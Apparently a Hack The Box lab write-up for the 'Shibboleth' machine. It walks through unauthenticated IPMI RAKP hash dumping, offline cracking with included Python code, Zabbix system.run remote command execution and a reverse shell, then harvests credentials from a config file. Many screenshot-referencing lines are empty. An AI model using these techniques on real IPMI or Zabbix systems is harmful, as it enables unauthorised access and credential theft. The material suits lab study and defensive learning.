👁️Shibboleth
https://app.hackthebox.com/machines/410
After a quick nmap, we only find port 80 open. After a closer look:
Looking at the webserver:
We see some Bootstrap, so maybe this box has a CVE-related exploit ->
We are also able to pull some possible usernames:
At the end of the page I also find some possible backend technologies that could be our entry point.
In a previous scan we noted that every vhost returning a 302 had 26 words in the response, so the --hw flag is used to hide responses with that word count: wfuzz drops every answer that has exactly 26 words (the generic redirect page) and only shows the subdomains that respond differently.
There is a zabbix subdomain, so it's probably the way to go; we need to add those hostnames to the /etc/hosts file.
A good thing to do after that is to launch feroxbuster, a web-content enumeration tool. The command performs a directory bruteforce against the target URL http://shibboleth.htb with the wordlist /usr/share/SecLists/Discovery/Web-Content/raft-medium-directories.txt, which is passed with the -w flag.
Nothing very interesting.
The subdomains we found earlier all redirect to this page:
Tried default creds, but it did not work:
Let's try to find other ways in for the moment:
Interesting, Zabbix may have been a rabbit hole.
We can see that the default port is 623, let's check:
We have to be extremely careful here, because when we type in this command:
but if we type in this command
the -sU flag selects a UDP scan. The target runs a service on port 623 over UDP only, so a plain TCP scan does not see it at all: IPMI's RMCP+ interface listens on UDP 623 by design, and a firewall could in any case block TCP on that port while still letting UDP through.
Let's follow the HackTricks methods to enumerate:
Identify the version using:
nmap produced this output:
and msfconsole:
I followed the IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval path (Metasploit's ipmi_dumphashes auxiliary module) and tried it out. It works because in the RAKP handshake the BMC answers with an HMAC keyed with the user's password before the client has proven anything, so the value can be requested anonymously and cracked offline:
I just had to set RHOSTS and it retrieved this:
Now let's find the type of hash:
So the hashcat command (mode 7300, IPMI2 RAKP HMAC-SHA1) would look like:
using the --user flag because each hash line starts with the username.
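To make concrete what hashcat is doing with mode 7300, here is an added Python example (not part of the original writeup, and not Metasploit's or hashcat's code) that rebuilds the RAKP data a BMC signs, checks candidate passwords against a user:salt:hash line in the --user format, and emits such a line. The handshake values, username and password in it are constructed for the demo; the salt layout is the one hashcat's 7300 mode expects.

```python
import hashlib
import hmac
from typing import Iterable, Optional


def rakp_salt(sid_m: bytes, sid_c: bytes, rand_m: bytes, rand_c: bytes,
              guid_c: bytes, role: int, username: str) -> bytes:
    """Concatenate the fields the BMC HMACs in RAKP message 2.

    Layout: SID_m(4) | SID_c(4) | Rand_m(16) | Rand_c(16) | GUID_c(16)
            | Role(1) | ULen(1) | Username
    This byte string is the 'salt' half of a hashcat -m 7300 line; its
    HMAC-SHA1 keyed with the user's password is the 'hash' half.
    """
    for name, val, n in (("sid_m", sid_m, 4), ("sid_c", sid_c, 4),
                         ("rand_m", rand_m, 16), ("rand_c", rand_c, 16),
                         ("guid_c", guid_c, 16)):
        if len(val) != n:
            raise ValueError(f"{name} must be {n} bytes, got {len(val)}")
    uname = username.encode()
    return sid_m + sid_c + rand_m + rand_c + guid_c + bytes([role, len(uname)]) + uname


def rakp_hmac(password: str, salt: bytes) -> bytes:
    """What the BMC returns: HMAC-SHA1 keyed with the password, over the salt."""
    return hmac.new(password.encode(), salt, hashlib.sha1).digest()


def crack_rakp(hash_line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline guessing against one 'user:salt:hash' line (hashcat --user format)."""
    _user, salt_hex, digest_hex = hash_line.strip().split(":")
    salt, target = bytes.fromhex(salt_hex), bytes.fromhex(digest_hex)
    for candidate in wordlist:
        if hmac.compare_digest(rakp_hmac(candidate, salt), target):
            return candidate
    return None


# Constructed handshake values for the demo; nothing here was captured from the box.
SAMPLE_USER = "Administrator"
SAMPLE_PASSWORD = "n0t-the-real-one"   # assumption: stands in for the cracked password


def make_sample_hash_line(password: str = SAMPLE_PASSWORD) -> str:
    """Play the BMC: build the salt and HMAC that a dump tool would print for this user."""
    salt = rakp_salt(sid_m=bytes.fromhex("a1b2c3d4"),
                     sid_c=bytes.fromhex("00000001"),
                     rand_m=bytes(range(16)),          # would be random in a real exchange
                     rand_c=bytes(range(16, 32)),
                     guid_c=bytes(16),
                     role=0x14,                        # admin privilege, name-only lookup
                     username=SAMPLE_USER)
    return f"{SAMPLE_USER}:{salt.hex()}:{rakp_hmac(password, salt).hex()}"


if __name__ == "__main__":
    line = make_sample_hash_line()
    print(line)   # same shape as a line for: hashcat -m 7300 --user hashes.txt wordlist.txt
    print(crack_rakp(line, ["password", "admin", "changeme", SAMPLE_PASSWORD]))
```

The plain 7300 format is just salt:hash; the username in front is why --user is needed, and the whole thing is crackable at HMAC-SHA1 speed because the BMC hands the keyed MAC to anyone who starts a session.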
We arrive on this dashboard:
After some enumeration, we find this:
Top right of the screen there is a Create item button, let's see:
Put whatever you like for the name and system.run[id] for the key.
Then click the Test button and then Get value: it outputs the result of the id command, so we have RCE.
So we can try a reverse shell that we double-encode to avoid errors and special-character problems:
Let's try only base64 for now:
It did not work. The + characters in the base64 output bother me (a literal + in a form-encoded request is decoded as a space, which corrupts the blob), so if we double each space inside the command, which the shell does not care about, the base64 alignment shifts and the + characters disappear:
So in the key parameter:
The final version of the payload used port 443, so:
and the RCE parameter was:
Set up a listener, click on Test, then Get value:
We get some type of timeout.
While looking through the documentation for a way to stabilise the shell, or a command that would spawn a new one, we saw how system.run really works:
Zabbix waits for the command to finish and returns its output, which is why a reverse shell that never exits times out. So let's try the nowait parameter, system.run[command,nowait], which returns immediately and leaves the command running.
I get a persistent shell but can't access user.txt.
After being stuck for a bit, I saw that I was not logged in as the user who owns the flag, so I tried switching to that user with the password found earlier (the one that got us into Zabbix), and it worked:
After a bit of looking around, we found something that could be the way to go:
netstat -tnl lists the TCP sockets that are in the LISTEN state (-t TCP only, -n numeric addresses and ports, -l listening sockets only), so it shows which local ports have a service bound to them, without the established connections. This is useful for spotting services that are only reachable from localhost.
10050 and 10051 are Zabbix (agent and server). 80 is the web stuff. 3306 is MySQL, which also backs Zabbix.
So after looking around for possible MySQL creds, I found this directory:
The command cat zabbix_server.conf | grep -v "^#" | grep . displays only the non-comment, non-blank lines of zabbix_server.conf, i.e. the settings that are actually active.
grep -v "^#": grep searches and filters lines from its input; -v inverts the match, so only lines that do not match the pattern are printed. The pattern "^#" matches lines that begin with #, which are comments in this file format, so they are dropped.
grep .: the pattern . matches any single character, so only lines containing at least one character survive; this drops the blank lines.
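Added Python example (not from the writeup) that does the same filtering as the grep pipeline above, parses the surviving Key=Value lines, pulls the DB settings out of them and builds the mysql command line to use with them. The configuration text inside it is constructed, not the box's file.

```python
from typing import Dict, Iterator, List, Optional

# Constructed stand-in for /etc/zabbix/zabbix_server.conf; not the box's file.
SAMPLE_CONF = """\
# This is a configuration file for Zabbix server daemon
### Option: ListenPort
#   Listen port for trapper.
# ListenPort=10051

LogFile=/var/log/zabbix/zabbix_server.log
DBName=zabbix
DBUser=zabbix
DBPassword=s3cret#not-a-comment
Include=/etc/zabbix/zabbix_server.conf.d/*.conf
Timeout=4
"""


def active_lines(text: str) -> Iterator[str]:
    """Same filter as `grep -v "^#" | grep .`: drop comment and blank lines."""
    for line in text.splitlines():
        if line.startswith("#") or not line.strip():
            continue
        yield line


def parse_zabbix_conf(text: str) -> Dict[str, List[str]]:
    """Parse the surviving Key=Value lines. Values are lists because some keys
    (Include, for one) may appear more than once. Only a leading '#' starts a
    comment, so a '#' inside a value such as a password is kept."""
    conf: Dict[str, List[str]] = {}
    for line in active_lines(text):
        if "=" not in line:
            continue
        key, _, value = line.partition("=")
        conf.setdefault(key.strip(), []).append(value.strip())
    return conf


def db_credentials(text: str) -> Dict[str, Optional[str]]:
    """Pull the database settings out; DBHost defaults to localhost in Zabbix."""
    conf = parse_zabbix_conf(text)

    def first(key: str) -> Optional[str]:
        return conf.get(key, [None])[0]

    return {"host": first("DBHost") or "localhost", "db": first("DBName"),
            "user": first("DBUser"), "password": first("DBPassword")}


def mysql_cmdline(creds: Dict[str, Optional[str]]) -> List[str]:
    """argv for the mysql client. -p<pw> with no space skips the prompt but shows
    the password in the process list; acceptable on a box you already control."""
    return ["mysql", "-h", creds["host"], "-u", creds["user"],
            f"-p{creds['password']}", creds["db"]]


if __name__ == "__main__":
    creds = db_credentials(SAMPLE_CONF)
    print(creds)
    print(" ".join(mysql_cmdline(creds)))
```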
We found credentials -> let's try to connect to the MySQL interface:
The shell gives us nothing and just hangs, so I thought about upgrading it:
This command uses the Python interpreter to spawn a Bash shell attached to a pseudo-terminal (PTY), which gives a more interactive and functional shell.
It did not seem to work, so I disconnected and came back to the plain shell:
and upgraded it using the standard script trick:
Switch user again and try connecting to MySQL.
Let's see what's inside this database:
In the screenshot above we can see the version of the database; let's look that up ->
I'll go and follow the methodology ->
Exit the DB to go back to the shell ->
and if you set up your listener earlier ->
The shell is ugly, so let's apply what we learned earlier about making it nicer ->
Once the shell is nice ->